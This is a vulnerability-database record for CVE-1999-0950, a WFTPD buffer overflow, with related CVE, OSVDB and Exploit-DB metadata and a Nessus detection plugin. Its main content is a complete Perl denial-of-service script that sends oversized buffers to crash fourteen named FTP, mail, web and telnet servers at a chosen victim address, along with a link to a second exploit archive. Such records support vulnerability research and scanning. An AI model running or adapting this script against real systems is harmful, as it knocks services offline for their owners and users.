{"id": "EDB-ID:19569", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow Vulnerability 1", "description": "WFTPD 2.34/2.40/3.0 Remote Buffer Overflow Vulnerability (1). CVE-1999-0950 . Dos exploit for windows platform", "published": "1999-10-28T00:00:00", "modified": "1999-10-28T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/19569/", "reporter": "Alberto Soli", "references": [], "cvelist": ["CVE-1999-0950"], "lastseen": "2016-02-02T12:09:09", "viewCount": 2, "enchantments": {"score": {"value": 7.9, "vector": "NONE", "modified": "2016-02-02T12:09:09", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-1999-0950"]}, {"type": "exploitdb", "idList": ["EDB-ID:19570"]}, {"type": "osvdb", "idList": ["OSVDB:1130"]}, {"type": "nessus", "idList": ["WU_FTPD_OVERFLOW.NASL"]}], "modified": "2016-02-02T12:09:09", "rev": 2}, "vulnersScore": 7.9}, "sourceHref": "https://www.exploit-db.com/download/19569/", "sourceData": "source: http://www.securityfocus.com/bid/747/info\r\n\r\n\r\nWFTPD is reported prone to a remote buffer overflow vulnerability. The issue exists due to a lack of sufficient bounds checking performed on MKD and CWD arguments. It is reported that superfluous data passed to MKD first and then to CWD results in the overflow.\r\n\r\nThis vulnerability may be exploited by a remote authenticate attacker to execute arbitrary code in the context of the affected service.\r\n\r\n#!/usr/bin/perl\r\n#####################################################################\r\n# Based upon advisories by USSR (www.ussrback.com)\t\t #\r\n#\t\t\t\t\t\t\t\t #\r\n# Demonstration script to remotely overflow various server buffers, #\r\n# resulting in a denial of service, for TESTING purposes only.\t #\r\n# Runs on *nix & WinXX with perl & Net::Telnet available from CPAN #\r\n#\t\t\t\t\t\t\t\t #\r\n# G6 FTP Server v2.0 beta4/5\t\t\t\t #\r\n# MDaemon httpd Server v2.8.5.0\t\t\t\t #\r\n# Avirt Mail Server v3.5\t\t\t\t\t #\r\n# BisonWare FTP Server v3.5\t\t\t\t\t #\r\n# Vermillion FTP Server v1.23\t\t\t\t\t #\r\n# ZetaMail POP3 Server v2.1\t\t\t\t\t #\r\n# WFTPD FTP Server 2.40\t\t\t\t\t #\r\n# BFTelnet Server v1.1\t\t\t\t\t #\r\n# Broker FTP Server v3.5\t\t\t\t #\r\n# ExpressFS FTP server v2.x\t\t\t\t\t #\r\n# XtraMail POP3 Server v1.11\t\t\t\t\t #\r\n# Cmail SMTP Server v2.4\t #\r\n# PakMail SMTP/POP3\t v1.25\t\t\t #\r\n#\t\t\t\t\t\t\t\t #\r\n# December '99\t\t\t\t\t\t\t #\r\n#####################################################################\r\n\r\nuse IO::Socket;\r\nuse Getopt::Std;\r\n#use Net::Telnet;\r\ngetopts('h:p:t:u:v', \\%args);\r\nif(!defined($args{h}) && !defined($args{t})) { \r\nprint qq~Usage: $0 -h <victim> -t <number> ((-u username) | (-p password)) | -v\r\n\r\n\t-h victim to test remote overflow DoS on\r\n\t-t server type (check the -v option for list)\r\n\t-u username authorisation (required if server prompts for username)\r\n\t-p password authentication (required if user/passwd is expected)\r\n\t-v lists all servers vulnerable to each DoS\r\n\r\n~; exit; }\r\n\r\nif(defined($args{u})) { $user=$args{u}; }\r\nif(defined($args{p})) { $pass=$args{p}; }\r\nif(defined($args{v})) { &vulnerable; }\r\nif(defined($args{h}) && defined($args{t})){\r\nif(($args{t}) == 1) { &G6; }\r\nif(($args{t}) == 2) { &mdaemon; }\r\nif(($args{t}) == 3) { &avirt; }\r\nif(($args{t}) == 4) { &bisonware; }\r\nif(($args{t}) == 5) { &vermillion; }\r\nif(($args{t}) == 6) { &zetamail; }\r\nif(($args{t}) == 7) { &wftpd; }\r\nif(($args{t}) == 8) { &bftelnet; } \r\nif(($args{t}) == 9) { &broker; } \r\nif(($args{t}) == 10) { &expressfs; } \r\nif(($args{t}) == 11) { &xtramail; }\r\nif(($args{t}) == 12) { &cmail; }\r\nif(($args{t}) == 13) { &pakmail; } \r\nif(($args{t}) == 14) { &pakpop; }}\r\n\r\nsub G6 { \r\n$denial .= \"A\" x 2000;\r\n$victim=$args{h};\r\n\t$socket = IO::Socket::INET->new (Proto => \"tcp\",\r\n\t\t\t\t \t PeerAddr => $victim,\r\n\t\t\t\t \t PeerPort => \"21\") or die \"Can't connect.\\n\";\r\n\t$socket->autoflush(1);\r\nprint $socket \"$denial\\n\"; # user\r\nprint \"\\nSent overflow to $victim\\n\";\r\nclose $socket; }\r\n\r\nsub mdaemon {\r\n$victim=$args{h};\r\n$denial .= \"A\" x 1025;\r\n$url = \"/$denial\";\r\n\t$socket = IO::Socket::INET->new (Proto => \"tcp\",\r\n\t\t\t\t\t PeerAddr => $victim,\r\n\t\t\t\t\t PeerPort => \"80\") or die \"Can't connect.\\n\";\r\nprint $socket \"GET $url\\n\";\r\nprint \"\\nSent overflow to $victim\\n\";\r\nclose $socket; }\r\n\r\nsub avirt { \r\n$victim=$args{h};\r\n$denial .= \"A\" x 856;\r\n\t$socket = IO::Socket::INET->new (Proto => \"tcp\",\r\n\t\t\t PeerAddr => $victim,\r\n \t\t\t PeerPort => \"25\") or die \"Can't connect\\n\";\r\n $socket->autoflush(1);\r\nprint $socket \"user $user\\n\";\r\nprint $socket \"pass $denial\\n\";\r\nprint \"\\nSent overflow to $victim\\n\";\r\nclose $socket; }\r\n\r\nsub bisonware {\r\n$victim=$args{h};\r\n$denial .= \"A\" x 2000;\r\n\t$socket = IO::Socket::INET->new (Proto => \"tcp\",\r\n\t\t\t PeerAddr => $victim,\r\n \t\t\t PeerPort => \"21\") or die \"Can't connect\\n\";\r\n $socket->autoflush(1);\r\nprint $socket \"$denial\\n\";\r\nprint \"\\nSent overflow to $victim\\n\";\r\nclose $socket; }\r\n\r\nsub vermillion {\r\n$victim=$args{h};\r\n$denial .= \"A\" x 504;\r\n\t$socket = IO::Socket::INET->new (Proto => \"tcp\",\r\n\t\t\t PeerAddr => $victim,\r\n \t\t\t PeerPort => \"21\") or die \"Can't connect\\n\";\r\n $socket->autoflush(1);\r\nprint $socket \"$user\\n\";\r\nprint $socket \"$pass\\n\";\r\nprint $socket \"cwd $denial\\n\";\r\nfor($i=0; $i<=3; $i++) { print $socket \"CWD $denial\\n\"; }\r\nprint \"\\nSent overflow to $victim\\n\";\r\nclose $socket; }\r\n\r\nsub zetamail {\r\n$victim=$args{h};\r\n$denial .= \"A\" x 3500;\r\n\t$socket = IO::Socket::INET->new (Proto => \"tcp\",\r\n\t\t\t\t\t PeerAddr => $victim,\r\n\t\t\t\t\t PeerPort => \"110\") or die \"Can't connect.\\n\";\r\nprint $socket \"user $denial\\n\"; \r\nprint $socket \"pass $denial\\n\";\r\nprint \"\\nSent overflow to $victim\\n\";\r\nclose $socket; }\r\n\r\nsub wftpd {\r\n$victim=$args{h};\r\n$denial .= \"A\" x 255;\r\n\t$socket = IO::Socket::INET->new (Proto => \"tcp\",\r\n\t\t\t\t\t PeerAddr => $victim,\r\n\t\t\t\t\t PeerPort => \"21\") or die \"Can't connect.\\n\";\r\nprint $socket \"$user\\n\";\r\nprint $socket \"$pass\\n\";\r\nprint $socket \"MKDIR $denial\\n\";\r\nprint $socket \"CWD $denial\\n\";\r\nprint \"\\nSent overflow to $victim\\n\";\r\nclose $socket; }\r\n\r\nsub bftelnet {\r\n# use Net::Telnet;\r\n$victim=$args{h};\r\n$denial .= \"A\" x 3090;\r\n$telnet = new Net::Telnet ( Timeout =>10,\r\n\t\t\t Errmode =>'die');\r\n$telnet->open('$victim');\r\n$telnet->waitfor('/Login: $/i');\r\n$telnet->print('$denial');\r\nprint \"\\nSent overflow to $victim\\n\";\r\nclose $telnet; }\r\n\r\nsub broker {\r\n$victim=$args{h};\r\n$denial .= \"A\" x 2730;\r\n\t$socket = IO::Socket::INET->new (Proto => \"tcp\",\r\n\t\t\t PeerAddr => $victim,\r\n \t\t\t PeerPort => \"21\") or die \"Can't connect.\\n\";\r\nprint $socket \"$denial\\n\";\r\nprint \"\\nSent overflow to $victim\\n\";\r\nclose $socket; }\r\n\r\n\r\nsub expressfs {\r\n$victim=$args{h};\r\n$denial .= \"A\" x 654;\r\n\t$socket = IO::Socket::INET->new (Proto => \"tcp\",\r\n\t\t\t PeerAddr => $victim,\r\n \t\t\t PeerPort => \"21\") or die \"Can't connect.\\n\";\r\nprint $socket \"$denial\\n\";\r\nprint $socket \"AAAAAAAAAAAAAAAAAAA\\n\";\r\nprint \"\\nSent overflow to $victim\\n\";\r\nclose $socket; }\r\n\r\nsub xtramail {\r\n$victim=$args{h};\r\n$denial .= \"A\" x 2930;\r\n\t$socket = IO::Socket::INET->new (Proto => \"tcp\",\r\n\t\t\t\t\t PeerAddr => $victim,\r\n\t\t\t\t\t PeerPort => \"25\") or die \"Can't connect.\\n\";\r\nprint $socket \"MAIL FROM: test\\@localhost\\n\";\r\nprint $socket \"RCPT TO: $denial\\@localhost\\n\";\r\nprint \"\\nSent overflow to $victim\\n\";\r\nclose $socket; }\r\n\r\nsub cmail {\r\n$victim=$args{h};\r\n$denial .= \"A\" x 7090;\r\n\t$socket = IO::Socket::INET->new (Proto => \"tcp\",\r\n\t\t\t\t\t PeerAddr => $victim,\r\n\t\t\t\t\t PeerPort => \"25\") or die \"Can't connect.\\n\";\r\nprint $socket \"MAIL FROM: $denial\\@localhost\\n\";\r\nprint \"\\nSent overflow to $victim\\n\";\r\nclose $socket; }\r\n\r\nsub pakmail {\r\n$victim=$args{h};\r\n$denial .= \"A\" x 1390;\r\n\t$socket = IO::Socket::INET->new (Proto => \"tcp\",\r\n\t\t\t\t\t PeerAddr => $victim,\r\n\t\t\t\t\t PeerPort => \"25\") or die \"Can't connect.\\n\";\r\nprint $socket \"MAIL FROM: test\\@localhost\\n\";\r\nprint $socket \"RCPT TO: $denial\\@localhost\\n\";\r\nprint \"\\nSent overflow to $victim\\n\";\r\nclose $socket; }\r\n\r\nsub pakpop {\r\n$victim=$args{h};\r\n$denial .= \"A\" x 1400;\r\n\t$socket = IO::Socket::INET->new (Proto => \"tcp\",\r\n\t\t\t\t\t PeerAddr => $victim,\r\n\t\t\t\t\t PeerPort => \"110\") or die \"Can't connect.\\n\";\r\nprint $socket \"user test\\n\";\r\nprint $socket \"pass $denial\\n\";\r\nprint \"\\nSent overflow to $victim\\n\";\r\nclose $socket; }\r\n\r\nsub vulnerable {\r\nprint qq~\r\n ______________________________________________________________________________\r\n Vulnerable Daemon Version Vulnerable Daemon Version\r\n ______________________________________________________________________________\r\n\r\n [1] G6 FTP Server v2.0b4/5 [2] MDaemon httpd Server v2.8.5.0\r\n\r\n [3] Avirt Mail Server v3.5 [4] BisonWare FTP Server v3.5\r\n\r\n [5] Vermillion FTP Server v1.23 [6] ZetaMail SMTP Server v2.1\r\n\r\n [7] WFTPD FTP Server v2.40 [8] BFTelnet Server v1.1\r\n\r\n [9] Broker FTP Server v3.5 [10] ExpressFS FTP Server v2.x \r\n\r\n[11] XtraMail POP3 Server v1.11 [12] Cmail SMTP Server v2.4\r\n\r\n[13] PakMail SMTP Server v1.25 [14] PakMail POP3 Server v1.25\r\n\r\n~; exit; }\r\n\r\n", "osvdbidlist": ["1130"]}

{"cve": [{"lastseen": "2020-10-03T11:36:55", "description": "Buffer overflow in WFTPD FTP server allows remote attackers to gain root access via\ta series of MKD and CWD commands that create nested directories.", "edition": 3, "cvss3": {}, "published": "1999-10-28T04:00:00", "title": "CVE-1999-0950", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0950"], "modified": "2008-09-09T12:36:00", "cpe": ["cpe:/a:texas_imperial_software:wftpd:2.34", "cpe:/a:texas_imperial_software:wftpd:2.40"], "id": "CVE-1999-0950", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0950", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:texas_imperial_software:wftpd:2.40:*:*:*:*:*:*:*", "cpe:2.3:a:texas_imperial_software:wftpd:2.34:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-1999-0950"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/1999-q3/1421.html\nISS X-Force ID: 3417\n[CVE-1999-0950](https://vulners.com/cve/CVE-1999-0950)\nBugtraq ID: 747\n", "modified": "1999-10-27T00:00:00", "published": "1999-10-27T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:1130", "id": "OSVDB:1130", "title": "WFTPD MKD/CWD Nested Command Remote Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T12:09:19", "description": "WFTPD 2.34/2.40/3.0 Remote Buffer Overflow Vulnerability (2). CVE-1999-0950 . Remote exploit for windows platform", "published": "1999-11-04T00:00:00", "type": "exploitdb", "title": "WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0950"], "modified": "1999-11-04T00:00:00", "id": "EDB-ID:19570", "href": "https://www.exploit-db.com/exploits/19570/", "sourceData": "source: http://www.securityfocus.com/bid/747/info\r\n \r\n \r\nWFTPD is reported prone to a remote buffer overflow vulnerability. The issue exists due to a lack of sufficient bounds checking performed on MKD and CWD arguments. It is reported that superfluous data passed to MKD first and then to CWD results in the overflow.\r\n \r\nThis vulnerability may be exploited by a remote authenticate attacker to execute arbitrary code in the context of the affected service.\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19570.tgz", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19570/"}], "nessus": [{"lastseen": "2021-01-01T07:01:06", "description": "It was possible to make the remote FTP server crash by creating a\nhuge directory structure. This is usually called the 'wu-ftpd buffer\noverflow' even though it affects other FTP servers.\n\nAn attacker can exploit this issue to crash the FTP server, or\nexecute arbitrary code.", "edition": 23, "published": "1999-08-31T00:00:00", "title": "WU-FTPD Multiple Vulnerabilities (OF, Priv Esc)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0950", "CVE-1999-0878", "CVE-1999-0879", "CVE-1999-0368"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "WU_FTPD_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/10318", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif(description)\n{\n script_id(10318);\n script_version (\"1.59\");\n\n script_cve_id(\"CVE-1999-0368\", \"CVE-1999-0878\", \"CVE-1999-0879\", \"CVE-1999-0950\");\n script_bugtraq_id(113, 599, 747, 2242);\n \n script_name(english:\"WU-FTPD Multiple Vulnerabilities (OF, Priv Esc)\");\n script_summary(english:\"Attempts a buffer overflow\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FTP server has a remote buffer overflow vulnerability.\"\n );\n script_set_attribute(attribute:\"description\", value:\n\"It was possible to make the remote FTP server crash by creating a\nhuge directory structure. This is usually called the 'wu-ftpd buffer\noverflow' even though it affects other FTP servers.\n\nAn attacker can exploit this issue to crash the FTP server, or\nexecute arbitrary code.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the latest version of the FTP server. Consider removing\ndirectories writable by 'anonymous'.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"1999/08/31\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"1999/02/09\");\n script_cvs_date(\"Date: 2018/08/07 16:46:50\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK); # mixed\n script_family(english:\"FTP\");\n \n script_copyright(english:\"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.\");\n\t\t \n script_dependencie(\"ftpserver_detect_type_nd_version.nasl\", \"ftp_writeable_directories.nasl\");\n script_require_keys(\"ftp/login\", \"ftp/writeable_dir\", \n \"Settings/ParanoidReport\");\n script_require_ports(\"Services/ftp\", 21);\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"ftp_func.inc\");\ninclude(\"audit.inc\");\n\nport = get_ftp_port(default: 21);\n\nbanner = get_ftp_banner(port:port);\nif ( ! banner || (\"wu-\" >!< banner &&\n \"wuftpd-\" >!< banner)) \n exit(0);\n\nif(!safe_checks())\n{\n# First, we need access\nlogin = get_kb_item(\"ftp/login\");\npassword = get_kb_item(\"ftp/password\");\n\n# Then, we need a writeable directory\nwri = get_kb_item(\"ftp/\"+port+\"/writeable_dir\");\nif (! wri) wri = get_kb_item(\"ftp/writeable_dir\");\n\n}\nelse\n{\n login = 0;\n wri = 0;\n}\n\n\nbanner = get_ftp_banner(port: port);\n\n\nif(login && wri)\n{\n# Connect to the FTP server\nsoc = open_sock_tcp(port);\nif(soc)\n{\n if(ftp_authenticate(socket:soc, user:login, pass:password))\n {\n \n # We are in\n \n c = string(\"CWD \", wri, \"\\r\\n\");\n send(socket:soc, data:c);\n b = ftp_recv_line(socket:soc);\n cwd = string(\"CWD \", crap(2540), \"\\r\\n\");\n mkd = string(\"MKD \", crap(2540), \"\\r\\n\");\n \n #\n # Repeat the same operation 20 times. After the 20th, we\n # assume that the server is immune (or has a bigger than\n # 5Kb buffer, which is unlikely)\n # \n \n num_dirs = 0;\n \n for(i=0;i<20;i=i+1)\n {\n send(socket:soc, data:mkd);\n b = ftp_recv_line(socket:soc);\n \n if(strlen(b) && !egrep(pattern:\"^257 .*\", string:b)){\n \tset_kb_item(name:\"ftp/no_mkdir\", value:TRUE);\n \tset_kb_item(name:\"ftp/\"+port+\"/no_mkdir\", value:TRUE);\n\ti = 20;\n\t}\n else\n {\n # No answer = the server has closed the connection. \n # The server should not crash after a MKD command\n # but who knows ?\n \n \n if(!b){\n \tsecurity_hole(port);\n\tset_kb_item(name:\"ftp/wu_ftpd_overflow\", value:TRUE);\n\tset_kb_item(name:\"ftp/\"+port+\"/wu_ftpd_overflow\", value:TRUE);\n\texit(0);\n\t}\n\t\n\t\n\t\n send(socket:soc,data:cwd);\n b = ftp_recv_line(socket:soc);\n if(strlen(b) && !egrep(pattern:\"^250 .*\", string:b))\n \t{\n \tset_kb_item(name:\"ftp/no_mkdir\", value:TRUE);\n \tset_kb_item(name:\"ftp/\"+port+\"/no_mkdir\", value:TRUE);\n\ti = 20;\n\t}\n else\n num_dirs = num_dirs + 1;\t\n \n #\n # See above. The server is likely to crash\n # here\n \n if(!b)\n {\n \tsecurity_hole(port);\n\tset_kb_item(name:\"ftp/wu_ftpd_overflow\", value:TRUE);\n\tset_kb_item(name:\"ftp/\"+port+\"/wu_ftpd_overflow\", value:TRUE);\n\texit(0);\n }\n }\n }\n ftp_close(socket: soc);\n \n \n #\n # Clean our mess\n #\n if(num_dirs == 0)exit(0);\n soc = open_sock_tcp(port);\n if(!soc)exit(0);\n ftp_authenticate(socket:soc, user:login, pass:password);\n send(socket:soc, data:string(\"CWD \", wri, \"\\r\\n\"));\n r = ftp_recv_line(socket:soc);\n for(j=0;j<num_dirs;j=j+1)\n {\n send(socket:soc, data:string(\"CWD \", crap(2540), \"\\r\\n\"));\n r = ftp_recv_line(socket:soc);\n }\n\n \n \n for(j=0;j<num_dirs+1;j=j+1)\n {\n send(socket:soc, data:string(\"RMD \", crap(2540), \"\\r\\n\"));\n r = ftp_recv_line(socket:soc);\n if(!egrep(pattern:\"^250 .*\", string:r))exit(0);\n send(socket:soc, data:string(\"CWD ..\\r\\n\"));\n r = ftp_recv_line(socket:soc);\n }\n \n }\n } \n exit(0);\n}\n\n\n\nif(banner)\n{\n if (report_paranoia < 2) audit(AUDIT_PARANOID);\n banner = tolower(banner);\n if(\"2.4.2\" >< banner)\n {\n if((egrep(pattern:\".*vr([0-9][^0-9]|10).*$\",string:banner)) ||\n (\"academ\" >< banner)){\n \t\t report = \n\"Warning : Nessus relied solely on the banner of this server,to detect \nthis vulnerability.\";\n \t\tsecurity_hole(port:port, extra:report);\n\t}\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}